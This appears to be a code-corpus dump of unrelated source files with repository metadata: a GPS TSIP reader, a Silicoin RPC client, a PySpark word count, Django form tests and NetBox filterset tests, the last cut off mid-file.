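#     RangeParameter(name="x", parameter_type=ParameterType.INT, lower=1, upper=4),
# ])
# t = IntRangeToChoice(search_space=ss, observation_features=[], observation_data=[])
# ss2 = t._transform_search_space(ss)
# # ss2.parameters["x"] is now an ordered ChoiceParameter with values [1, 2, 3, 4]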
| 42.821429
| 88
| 0.624409
|
9cb50af21a2fe3cc181aae2512b98c0bce169aca
| 915
|
py
|
Python
|
read_tsip.py
|
ZigmundRat/python-TSIP
|
79414f212e0253716298f14a22f29a124e48fb51
|
[
"BSD-2-Clause"
] | 7
|
2015-05-06T13:06:53.000Z
|
2019-12-11T11:05:25.000Z
|
read_tsip.py
|
ZigmundRat/python-TSIP
|
79414f212e0253716298f14a22f29a124e48fb51
|
[
"BSD-2-Clause"
] | 35
|
2015-06-17T21:51:07.000Z
|
2021-12-07T20:05:25.000Z
|
read_tsip.py
|
ZigmundRat/python-TSIP
|
79414f212e0253716298f14a22f29a124e48fb51
|
[
"BSD-2-Clause"
] | 10
|
2015-08-12T09:40:12.000Z
|
2022-02-09T10:58:12.000Z
|
#!/usr/bin/env python
"""
Read TSIP from a device of file.
(c) Markus Juenemann, 2015
"""
import sys
import os.path
import serial
import tsip
import time
import binascii
import logging
logging.basicConfig(level=logging.INFO)
def help():
sys.stderr.write("%s <file|device> [<baudrate>]\n" % sys.argv[0])
sys.exit(1)
def main():
try:
source = sys.argv[1]
except IndexError:
help()
if os.path.isfile(source):
conn = open(source)
else:
try:
baud = int(sys.argv[2])
except IndexError:
baud = 9600
except TypeError:
help()
conn = serial.Serial(source, baud)
gps = tsip.GPS(conn)
while True:
packet = gps.read()
if packet:
print "0x%0x %s" % (packet.code, packet.values)
else:
print 'None'
if __name__ == '__main__':
main()
| 15
| 59
| 0.549727
|
0cbd5b8b125dc48356cc1239cde6c2558e689021
| 3,032
|
py
|
Python
|
silicoin/rpc/rpc_client.py
|
zcomputerwiz/silicoin-light-wallet
|
1cdc3784effec229cc841a04655078b1d9913d33
|
[
"Apache-2.0"
] | null | null | null |
silicoin/rpc/rpc_client.py
|
zcomputerwiz/silicoin-light-wallet
|
1cdc3784effec229cc841a04655078b1d9913d33
|
[
"Apache-2.0"
] | null | null | null |
silicoin/rpc/rpc_client.py
|
zcomputerwiz/silicoin-light-wallet
|
1cdc3784effec229cc841a04655078b1d9913d33
|
[
"Apache-2.0"
] | null | null | null |
import asyncio
from ssl import SSLContext
from typing import Dict, List, Optional, Any
import aiohttp
from silicoin.server.server import NodeType, ssl_context_for_client
from silicoin.server.ssl_context import private_ssl_ca_paths
from silicoin.types.blockchain_format.sized_bytes import bytes32
from silicoin.util.byte_types import hexstr_to_bytes
from silicoin.util.ints import uint16
class RpcClient:
"""
Client to Silicoin RPC, connects to a local service. Uses HTTP/JSON, and converts back from
JSON into native python objects before returning. All api calls use POST requests.
Note that this is not the same as the peer protocol, or wallet protocol (which run Silicoin's
protocol on top of TCP), it's a separate protocol on top of HTTP that provides easy access
to the full node.
"""
url: str
session: aiohttp.ClientSession
closing_task: Optional[asyncio.Task]
ssl_context: Optional[SSLContext]
hostname: str
port: uint16
@classmethod
async def create(cls, self_hostname: str, port: uint16, root_path, net_config):
self = cls()
self.hostname = self_hostname
self.port = port
self.url = f"https://{self_hostname}:{str(port)}/"
self.session = aiohttp.ClientSession()
ca_crt_path, ca_key_path = private_ssl_ca_paths(root_path, net_config)
crt_path = root_path / net_config["daemon_ssl"]["private_crt"]
key_path = root_path / net_config["daemon_ssl"]["private_key"]
self.ssl_context = ssl_context_for_client(ca_crt_path, ca_key_path, crt_path, key_path)
self.closing_task = None
return self
async def fetch(self, path, request_json) -> Any:
async with self.session.post(self.url + path, json=request_json, ssl_context=self.ssl_context) as response:
response.raise_for_status()
res_json = await response.json()
if not res_json["success"]:
raise ValueError(res_json)
return res_json
async def get_connections(self, node_type: Optional[NodeType] = None) -> List[Dict]:
request = {}
if node_type is not None:
request["node_type"] = node_type.value
response = await self.fetch("get_connections", request)
for connection in response["connections"]:
connection["node_id"] = hexstr_to_bytes(connection["node_id"])
return response["connections"]
async def open_connection(self, host: str, port: int) -> Dict:
return await self.fetch("open_connection", {"host": host, "port": int(port)})
async def close_connection(self, node_id: bytes32) -> Dict:
return await self.fetch("close_connection", {"node_id": node_id.hex()})
async def stop_node(self) -> Dict:
return await self.fetch("stop_node", {})
def close(self):
self.closing_task = asyncio.create_task(self.session.close())
async def await_closed(self):
if self.closing_task is not None:
await self.closing_task
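# A hedged usage sketch (hostname, port and config layout are illustrative;
# assumes a running local service):
#
# async def example(root_path, net_config):
#     client = await RpcClient.create("localhost", uint16(8555), root_path, net_config)
#     try:
#         for connection in await client.get_connections():
#             print(connection["node_id"].hex())
#     finally:
#         client.close()
#         await client.await_closed()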
| 39.894737
| 115
| 0.690633
|
ee7d925680b56ae9b54ef367d34fb6f134949207
| 426
|
py
|
Python
|
rdd/WordCount.py
|
shubozhang/pyspark-tutorial
|
244f69bc75ad4238a00151dc7802bbb63e6f35e1
|
[
"MIT"
] | null | null | null |
rdd/WordCount.py
|
shubozhang/pyspark-tutorial
|
244f69bc75ad4238a00151dc7802bbb63e6f35e1
|
[
"MIT"
] | null | null | null |
rdd/WordCount.py
|
shubozhang/pyspark-tutorial
|
244f69bc75ad4238a00151dc7802bbb63e6f35e1
|
[
"MIT"
] | null | null | null |
from pyspark import SparkContext, SparkConf
if __name__ == "__main__":
conf = SparkConf().setAppName("word count").setMaster("local[3]")
sc = SparkContext(conf=conf)
lines = sc.textFile("in/word_count.text")
words = lines.flatMap(lambda line: line.split(" "))
wordCounts = words.countByValue()
for word, count in wordCounts.items():
print("{} : {}".format(word, count))
| 26.625
| 69
| 0.629108
|
f8ec40a4a91fd3dd2ea6050e42a1b2fbb20d26f9
| 2,773
|
py
|
Python
|
yatube/posts/tests/test_forms.py
|
vlad7632/hw03_forms
|
6a4d212ac3753b61513bf1e20931990655a2e4d1
|
[
"MIT"
] | null | null | null |
yatube/posts/tests/test_forms.py
|
vlad7632/hw03_forms
|
6a4d212ac3753b61513bf1e20931990655a2e4d1
|
[
"MIT"
] | null | null | null |
yatube/posts/tests/test_forms.py
|
vlad7632/hw03_forms
|
6a4d212ac3753b61513bf1e20931990655a2e4d1
|
[
"MIT"
] | null | null | null |
from django.contrib.auth import get_user_model
from django.test import Client, TestCase
from django.urls import reverse
from posts.forms import PostForm
from posts.models import Group, Post
User = get_user_model()
class PostFormTest(TestCase):
@classmethod
def setUpClass(cls):
super().setUpClass()
cls.user = User.objects.create_user(username='Vlad')
cls.guest_client = Client()
cls.authorized_client = Client()
cls.authorized_client.force_login(cls.user)
cls.group = Group.objects.create(
title='Заголовок',
slug='test_slug',
description='текстовоеполедлянаборатекста'
)
cls.group_new = Group.objects.create(
title='Заголовок_новый',
slug='test_slug_new',
description='текстовоеполедлянаборатекста'
)
cls.post = Post.objects.create(
text='Тестовый текст',
group=cls.group,
author=cls.user
)
cls.form = PostForm()
def test_create_post(self):
"""Проверка формы создания поста"""
post_count = Post.objects.count()
form_data = {
'text': 'Тестовый текст',
'group': PostFormTest.group.id,
}
response = self.authorized_client.post(
reverse('posts:post_create'),
data=form_data,
follow=True
)
self.assertRedirects(
response, reverse(
'posts:profile',
kwargs={'username': f'{self.user}'}
))
self.assertEqual(
Post.objects.count(),
post_count + 1)
self.assertTrue(
Post.objects.filter(
text='Тестовый текст',
group=PostFormTest.group.id
).exists())
def test_edit_post(self):
"""Проверка формы редактирования поста"""
form_data = {
'text': 'Тестовый тест 2',
'group': PostFormTest.group_new.id
}
response = self.authorized_client.post(
reverse(
'posts:update_post',
kwargs={'post_id': f'{self.post.id}'}),
data=form_data,
follow=True
)
self.assertRedirects(
response,
reverse(
'posts:post_detail',
kwargs={'post_id': f'{self.post.id}'}
))
self.assertTrue(
Post.objects.filter(
text='Тестовый тест 2',
group=PostFormTest.group_new.id
).exists())
self.assertFalse(
Post.objects.filter(
text='Тестовый текст',
group=PostFormTest.group.id
).exists())
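# A hedged sketch of the form these tests exercise (the real PostForm lives in
# posts/forms.py; the fields are inferred from the form_data dicts above):
#
# class PostForm(forms.ModelForm):
#     class Meta:
#         model = Post
#         fields = ('text', 'group')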
| 30.811111
| 60
| 0.538406
|
68a4b5571803c8a3ab51ac4820427b976f34943c
| 156,155
|
py
|
Python
|
netbox/dcim/tests/test_filtersets.py
|
peteeckel/netbox
|
06cb7f35f1698f6a0b43014e8bebe37a97237308
|
[
"Apache-2.0"
] | 1
|
2022-03-11T09:38:32.000Z
|
2022-03-11T09:38:32.000Z
|
netbox/dcim/tests/test_filtersets.py
|
peteeckel/netbox
|
06cb7f35f1698f6a0b43014e8bebe37a97237308
|
[
"Apache-2.0"
] | null | null | null |
netbox/dcim/tests/test_filtersets.py
|
peteeckel/netbox
|
06cb7f35f1698f6a0b43014e8bebe37a97237308
|
[
"Apache-2.0"
] | null | null | null |
from django.contrib.auth.models import User
from django.test import TestCase
from dcim.choices import *
from dcim.filtersets import *
from dcim.models import *
from ipam.models import ASN, IPAddress, RIR
from tenancy.models import Tenant, TenantGroup
from utilities.choices import ColorChoices
from utilities.testing import ChangeLoggedFilterSetTests
from virtualization.models import Cluster, ClusterType
from wireless.choices import WirelessChannelChoices, WirelessRoleChoices
class RegionTestCase(TestCase, ChangeLoggedFilterSetTests):
queryset = Region.objects.all()
filterset = RegionFilterSet
@classmethod
def setUpTestData(cls):
regions = (
Region(name='Region 1', slug='region-1', description='A'),
Region(name='Region 2', slug='region-2', description='B'),
Region(name='Region 3', slug='region-3', description='C'),
)
for region in regions:
region.save()
child_regions = (
Region(name='Region 1A', slug='region-1a', parent=regions[0]),
Region(name='Region 1B', slug='region-1b', parent=regions[0]),
Region(name='Region 2A', slug='region-2a', parent=regions[1]),
Region(name='Region 2B', slug='region-2b', parent=regions[1]),
Region(name='Region 3A', slug='region-3a', parent=regions[2]),
Region(name='Region 3B', slug='region-3b', parent=regions[2]),
)
for region in child_regions:
region.save()
def test_name(self):
params = {'name': ['Region 1', 'Region 2']}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
def test_slug(self):
params = {'slug': ['region-1', 'region-2']}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
def test_description(self):
params = {'description': ['A', 'B']}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
def test_parent(self):
parent_regions = Region.objects.filter(parent__isnull=True)[:2]
params = {'parent_id': [parent_regions[0].pk, parent_regions[1].pk]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 4)
params = {'parent': [parent_regions[0].slug, parent_regions[1].slug]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 4)
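# The assertions above follow the django-filter pattern used throughout this
# module: instantiate the FilterSet with a params dict and a base queryset,
# then inspect the filtered queryset via `.qs`. A hedged standalone sketch:
#
# fs = RegionFilterSet({'name': ['Region 1']}, queryset=Region.objects.all())
# fs.qs.count()  # -> 1 with the fixtures above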
class SiteGroupTestCase(TestCase, ChangeLoggedFilterSetTests):
queryset = SiteGroup.objects.all()
filterset = SiteGroupFilterSet
@classmethod
def setUpTestData(cls):
sitegroups = (
SiteGroup(name='Site Group 1', slug='site-group-1', description='A'),
SiteGroup(name='Site Group 2', slug='site-group-2', description='B'),
SiteGroup(name='Site Group 3', slug='site-group-3', description='C'),
)
for sitegroup in sitegroups:
sitegroup.save()
child_sitegroups = (
SiteGroup(name='Site Group 1A', slug='site-group-1a', parent=sitegroups[0]),
SiteGroup(name='Site Group 1B', slug='site-group-1b', parent=sitegroups[0]),
SiteGroup(name='Site Group 2A', slug='site-group-2a', parent=sitegroups[1]),
SiteGroup(name='Site Group 2B', slug='site-group-2b', parent=sitegroups[1]),
SiteGroup(name='Site Group 3A', slug='site-group-3a', parent=sitegroups[2]),
SiteGroup(name='Site Group 3B', slug='site-group-3b', parent=sitegroups[2]),
)
for sitegroup in child_sitegroups:
sitegroup.save()
def test_name(self):
params = {'name': ['Site Group 1', 'Site Group 2']}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
def test_slug(self):
params = {'slug': ['site-group-1', 'site-group-2']}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
def test_description(self):
params = {'description': ['A', 'B']}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
def test_parent(self):
parent_sitegroups = SiteGroup.objects.filter(parent__isnull=True)[:2]
params = {'parent_id': [parent_sitegroups[0].pk, parent_sitegroups[1].pk]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 4)
params = {'parent': [parent_sitegroups[0].slug, parent_sitegroups[1].slug]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 4)
class SiteTestCase(TestCase, ChangeLoggedFilterSetTests):
queryset = Site.objects.all()
filterset = SiteFilterSet
@classmethod
def setUpTestData(cls):
regions = (
Region(name='Region 1', slug='region-1'),
Region(name='Region 2', slug='region-2'),
Region(name='Region 3', slug='region-3'),
)
for region in regions:
region.save()
groups = (
SiteGroup(name='Site Group 1', slug='site-group-1'),
SiteGroup(name='Site Group 2', slug='site-group-2'),
SiteGroup(name='Site Group 3', slug='site-group-3'),
)
for group in groups:
group.save()
tenant_groups = (
TenantGroup(name='Tenant group 1', slug='tenant-group-1'),
TenantGroup(name='Tenant group 2', slug='tenant-group-2'),
TenantGroup(name='Tenant group 3', slug='tenant-group-3'),
)
for tenantgroup in tenant_groups:
tenantgroup.save()
tenants = (
Tenant(name='Tenant 1', slug='tenant-1', group=tenant_groups[0]),
Tenant(name='Tenant 2', slug='tenant-2', group=tenant_groups[1]),
Tenant(name='Tenant 3', slug='tenant-3', group=tenant_groups[2]),
)
Tenant.objects.bulk_create(tenants)
rir = RIR.objects.create(name='RFC 6996', is_private=True)
asns = (
ASN(asn=64512, rir=rir, tenant=tenants[0]),
ASN(asn=64513, rir=rir, tenant=tenants[0]),
ASN(asn=64514, rir=rir, tenant=tenants[0]),
)
ASN.objects.bulk_create(asns)
sites = (
Site(name='Site 1', slug='site-1', region=regions[0], group=groups[0], tenant=tenants[0], status=SiteStatusChoices.STATUS_ACTIVE, facility='Facility 1', asn=65001, latitude=10, longitude=10, contact_name='Contact 1', contact_phone='123-555-0001', contact_email='contact1@example.com', description='foobar1'),
Site(name='Site 2', slug='site-2', region=regions[1], group=groups[1], tenant=tenants[1], status=SiteStatusChoices.STATUS_PLANNED, facility='Facility 2', asn=65002, latitude=20, longitude=20, contact_name='Contact 2', contact_phone='123-555-0002', contact_email='contact2@example.com', description='foobar2'),
Site(name='Site 3', slug='site-3', region=regions[2], group=groups[2], tenant=tenants[2], status=SiteStatusChoices.STATUS_RETIRED, facility='Facility 3', asn=65003, latitude=30, longitude=30, contact_name='Contact 3', contact_phone='123-555-0003', contact_email='contact3@example.com'),
)
Site.objects.bulk_create(sites)
sites[0].asns.set([asns[0]])
sites[1].asns.set([asns[1]])
sites[2].asns.set([asns[2]])
def test_name(self):
params = {'name': ['Site 1', 'Site 2']}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
def test_slug(self):
params = {'slug': ['site-1', 'site-2']}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
def test_facility(self):
params = {'facility': ['Facility 1', 'Facility 2']}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
def test_asn(self):
params = {'asn': [65001, 65002]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
def test_asn_id(self):
asns = ASN.objects.all()[:2]
params = {'asn_id': [asns[0].pk, asns[1].pk]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
def test_latitude(self):
params = {'latitude': [10, 20]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
def test_longitude(self):
params = {'longitude': [10, 20]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
def test_contact_name(self):
params = {'contact_name': ['Contact 1', 'Contact 2']}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
def test_contact_phone(self):
params = {'contact_phone': ['123-555-0001', '123-555-0002']}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
def test_contact_email(self):
params = {'contact_email': ['contact1@example.com', 'contact2@example.com']}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
def test_description(self):
params = {'description': ['foobar1', 'foobar2']}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
def test_status(self):
params = {'status': [SiteStatusChoices.STATUS_ACTIVE, SiteStatusChoices.STATUS_PLANNED]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
def test_region(self):
regions = Region.objects.all()[:2]
params = {'region_id': [regions[0].pk, regions[1].pk]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
params = {'region': [regions[0].slug, regions[1].slug]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
def test_site_group(self):
groups = SiteGroup.objects.all()[:2]
params = {'group_id': [groups[0].pk, groups[1].pk]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
params = {'group': [groups[0].slug, groups[1].slug]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
def test_tenant(self):
tenants = Tenant.objects.all()[:2]
params = {'tenant_id': [tenants[0].pk, tenants[1].pk]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
params = {'tenant': [tenants[0].slug, tenants[1].slug]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
def test_tenant_group(self):
tenant_groups = TenantGroup.objects.all()[:2]
params = {'tenant_group_id': [tenant_groups[0].pk, tenant_groups[1].pk]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
params = {'tenant_group': [tenant_groups[0].slug, tenant_groups[1].slug]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
class LocationTestCase(TestCase, ChangeLoggedFilterSetTests):
queryset = Location.objects.all()
filterset = LocationFilterSet
@classmethod
def setUpTestData(cls):
regions = (
Region(name='Region 1', slug='region-1'),
Region(name='Region 2', slug='region-2'),
Region(name='Region 3', slug='region-3'),
)
for region in regions:
region.save()
groups = (
SiteGroup(name='Site Group 1', slug='site-group-1'),
SiteGroup(name='Site Group 2', slug='site-group-2'),
SiteGroup(name='Site Group 3', slug='site-group-3'),
)
for group in groups:
group.save()
sites = (
Site(name='Site 1', slug='site-1', region=regions[0], group=groups[0]),
Site(name='Site 2', slug='site-2', region=regions[1], group=groups[1]),
Site(name='Site 3', slug='site-3', region=regions[2], group=groups[2]),
)
Site.objects.bulk_create(sites)
parent_locations = (
Location(name='Parent Location 1', slug='parent-location-1', site=sites[0]),
Location(name='Parent Location 2', slug='parent-location-2', site=sites[1]),
Location(name='Parent Location 3', slug='parent-location-3', site=sites[2]),
)
for location in parent_locations:
location.save()
locations = (
Location(name='Location 1', slug='location-1', site=sites[0], parent=parent_locations[0], description='A'),
Location(name='Location 2', slug='location-2', site=sites[1], parent=parent_locations[1], description='B'),
Location(name='Location 3', slug='location-3', site=sites[2], parent=parent_locations[2], description='C'),
)
for location in locations:
location.save()
def test_name(self):
params = {'name': ['Location 1', 'Location 2']}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
def test_slug(self):
params = {'slug': ['location-1', 'location-2']}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
def test_description(self):
params = {'description': ['A', 'B']}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
def test_region(self):
regions = Region.objects.all()[:2]
params = {'region_id': [regions[0].pk, regions[1].pk]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 4)
params = {'region': [regions[0].slug, regions[1].slug]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 4)
def test_site_group(self):
site_groups = SiteGroup.objects.all()[:2]
params = {'site_group_id': [site_groups[0].pk, site_groups[1].pk]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 4)
params = {'site_group': [site_groups[0].slug, site_groups[1].slug]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 4)
def test_site(self):
sites = Site.objects.all()[:2]
params = {'site_id': [sites[0].pk, sites[1].pk]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 4)
params = {'site': [sites[0].slug, sites[1].slug]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 4)
def test_parent(self):
parent_groups = Location.objects.filter(name__startswith='Parent')[:2]
params = {'parent_id': [parent_groups[0].pk, parent_groups[1].pk]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
params = {'parent': [parent_groups[0].slug, parent_groups[1].slug]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
class RackRoleTestCase(TestCase, ChangeLoggedFilterSetTests):
queryset = RackRole.objects.all()
filterset = RackRoleFilterSet
@classmethod
def setUpTestData(cls):
rack_roles = (
RackRole(name='Rack Role 1', slug='rack-role-1', color='ff0000', description='foobar1'),
RackRole(name='Rack Role 2', slug='rack-role-2', color='00ff00', description='foobar2'),
RackRole(name='Rack Role 3', slug='rack-role-3', color='0000ff'),
)
RackRole.objects.bulk_create(rack_roles)
def test_name(self):
params = {'name': ['Rack Role 1', 'Rack Role 2']}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
def test_slug(self):
params = {'slug': ['rack-role-1', 'rack-role-2']}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
def test_color(self):
params = {'color': ['ff0000', '00ff00']}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
def test_description(self):
params = {'description': ['foobar1', 'foobar2']}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
class RackTestCase(TestCase, ChangeLoggedFilterSetTests):
queryset = Rack.objects.all()
filterset = RackFilterSet
@classmethod
def setUpTestData(cls):
regions = (
Region(name='Region 1', slug='region-1'),
Region(name='Region 2', slug='region-2'),
Region(name='Region 3', slug='region-3'),
)
for region in regions:
region.save()
groups = (
SiteGroup(name='Site Group 1', slug='site-group-1'),
SiteGroup(name='Site Group 2', slug='site-group-2'),
SiteGroup(name='Site Group 3', slug='site-group-3'),
)
for group in groups:
group.save()
sites = (
Site(name='Site 1', slug='site-1', region=regions[0], group=groups[0]),
Site(name='Site 2', slug='site-2', region=regions[1], group=groups[1]),
Site(name='Site 3', slug='site-3', region=regions[2], group=groups[2]),
)
Site.objects.bulk_create(sites)
locations = (
Location(name='Location 1', slug='location-1', site=sites[0]),
Location(name='Location 2', slug='location-2', site=sites[1]),
Location(name='Location 3', slug='location-3', site=sites[2]),
)
for location in locations:
location.save()
rack_roles = (
RackRole(name='Rack Role 1', slug='rack-role-1'),
RackRole(name='Rack Role 2', slug='rack-role-2'),
RackRole(name='Rack Role 3', slug='rack-role-3'),
)
RackRole.objects.bulk_create(rack_roles)
tenant_groups = (
TenantGroup(name='Tenant group 1', slug='tenant-group-1'),
TenantGroup(name='Tenant group 2', slug='tenant-group-2'),
TenantGroup(name='Tenant group 3', slug='tenant-group-3'),
)
for tenantgroup in tenant_groups:
tenantgroup.save()
tenants = (
Tenant(name='Tenant 1', slug='tenant-1', group=tenant_groups[0]),
Tenant(name='Tenant 2', slug='tenant-2', group=tenant_groups[1]),
Tenant(name='Tenant 3', slug='tenant-3', group=tenant_groups[2]),
)
Tenant.objects.bulk_create(tenants)
racks = (
Rack(name='Rack 1', facility_id='rack-1', site=sites[0], location=locations[0], tenant=tenants[0], status=RackStatusChoices.STATUS_ACTIVE, role=rack_roles[0], serial='ABC', asset_tag='1001', type=RackTypeChoices.TYPE_2POST, width=RackWidthChoices.WIDTH_19IN, u_height=42, desc_units=False, outer_width=100, outer_depth=100, outer_unit=RackDimensionUnitChoices.UNIT_MILLIMETER),
Rack(name='Rack 2', facility_id='rack-2', site=sites[1], location=locations[1], tenant=tenants[1], status=RackStatusChoices.STATUS_PLANNED, role=rack_roles[1], serial='DEF', asset_tag='1002', type=RackTypeChoices.TYPE_4POST, width=RackWidthChoices.WIDTH_21IN, u_height=43, desc_units=False, outer_width=200, outer_depth=200, outer_unit=RackDimensionUnitChoices.UNIT_MILLIMETER),
Rack(name='Rack 3', facility_id='rack-3', site=sites[2], location=locations[2], tenant=tenants[2], status=RackStatusChoices.STATUS_RESERVED, role=rack_roles[2], serial='GHI', asset_tag='1003', type=RackTypeChoices.TYPE_CABINET, width=RackWidthChoices.WIDTH_23IN, u_height=44, desc_units=True, outer_width=300, outer_depth=300, outer_unit=RackDimensionUnitChoices.UNIT_INCH),
)
Rack.objects.bulk_create(racks)
def test_name(self):
params = {'name': ['Rack 1', 'Rack 2']}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
def test_facility_id(self):
params = {'facility_id': ['rack-1', 'rack-2']}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
def test_asset_tag(self):
params = {'asset_tag': ['1001', '1002']}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
def test_type(self):
params = {'type': [RackTypeChoices.TYPE_2POST, RackTypeChoices.TYPE_4POST]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
def test_width(self):
params = {'width': [RackWidthChoices.WIDTH_19IN, RackWidthChoices.WIDTH_21IN]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
def test_u_height(self):
params = {'u_height': [42, 43]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
def test_desc_units(self):
params = {'desc_units': 'true'}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 1)
params = {'desc_units': 'false'}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
def test_outer_width(self):
params = {'outer_width': [100, 200]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
def test_outer_depth(self):
params = {'outer_depth': [100, 200]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
def test_outer_unit(self):
self.assertEqual(Rack.objects.filter(outer_unit__isnull=False).count(), 3)
params = {'outer_unit': RackDimensionUnitChoices.UNIT_MILLIMETER}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
def test_region(self):
regions = Region.objects.all()[:2]
params = {'region_id': [regions[0].pk, regions[1].pk]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
params = {'region': [regions[0].slug, regions[1].slug]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
def test_site_group(self):
site_groups = SiteGroup.objects.all()[:2]
params = {'site_group_id': [site_groups[0].pk, site_groups[1].pk]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
params = {'site_group': [site_groups[0].slug, site_groups[1].slug]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
def test_site(self):
sites = Site.objects.all()[:2]
params = {'site_id': [sites[0].pk, sites[1].pk]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
params = {'site': [sites[0].slug, sites[1].slug]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
def test_location(self):
locations = Location.objects.all()[:2]
params = {'location_id': [locations[0].pk, locations[1].pk]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
params = {'location': [locations[0].slug, locations[1].slug]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
def test_status(self):
params = {'status': [RackStatusChoices.STATUS_ACTIVE, RackStatusChoices.STATUS_PLANNED]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
def test_role(self):
roles = RackRole.objects.all()[:2]
params = {'role_id': [roles[0].pk, roles[1].pk]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
params = {'role': [roles[0].slug, roles[1].slug]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
def test_serial(self):
params = {'serial': 'ABC'}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 1)
params = {'serial': 'abc'}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 1)
def test_tenant(self):
tenants = Tenant.objects.all()[:2]
params = {'tenant_id': [tenants[0].pk, tenants[1].pk]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
params = {'tenant': [tenants[0].slug, tenants[1].slug]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
def test_tenant_group(self):
tenant_groups = TenantGroup.objects.all()[:2]
params = {'tenant_group_id': [tenant_groups[0].pk, tenant_groups[1].pk]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
params = {'tenant_group': [tenant_groups[0].slug, tenant_groups[1].slug]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
class RackReservationTestCase(TestCase, ChangeLoggedFilterSetTests):
queryset = RackReservation.objects.all()
filterset = RackReservationFilterSet
@classmethod
def setUpTestData(cls):
sites = (
Site(name='Site 1', slug='site-1'),
Site(name='Site 2', slug='site-2'),
Site(name='Site 3', slug='site-3'),
)
Site.objects.bulk_create(sites)
locations = (
Location(name='Location 1', slug='location-1', site=sites[0]),
Location(name='Location 2', slug='location-2', site=sites[1]),
Location(name='Location 3', slug='location-3', site=sites[2]),
)
for location in locations:
location.save()
racks = (
Rack(name='Rack 1', site=sites[0], location=locations[0]),
Rack(name='Rack 2', site=sites[1], location=locations[1]),
Rack(name='Rack 3', site=sites[2], location=locations[2]),
)
Rack.objects.bulk_create(racks)
users = (
User(username='User 1'),
User(username='User 2'),
User(username='User 3'),
)
User.objects.bulk_create(users)
tenant_groups = (
TenantGroup(name='Tenant group 1', slug='tenant-group-1'),
TenantGroup(name='Tenant group 2', slug='tenant-group-2'),
TenantGroup(name='Tenant group 3', slug='tenant-group-3'),
)
for tenantgroup in tenant_groups:
tenantgroup.save()
tenants = (
Tenant(name='Tenant 1', slug='tenant-1', group=tenant_groups[0]),
Tenant(name='Tenant 2', slug='tenant-2', group=tenant_groups[1]),
Tenant(name='Tenant 3', slug='tenant-3', group=tenant_groups[2]),
)
Tenant.objects.bulk_create(tenants)
reservations = (
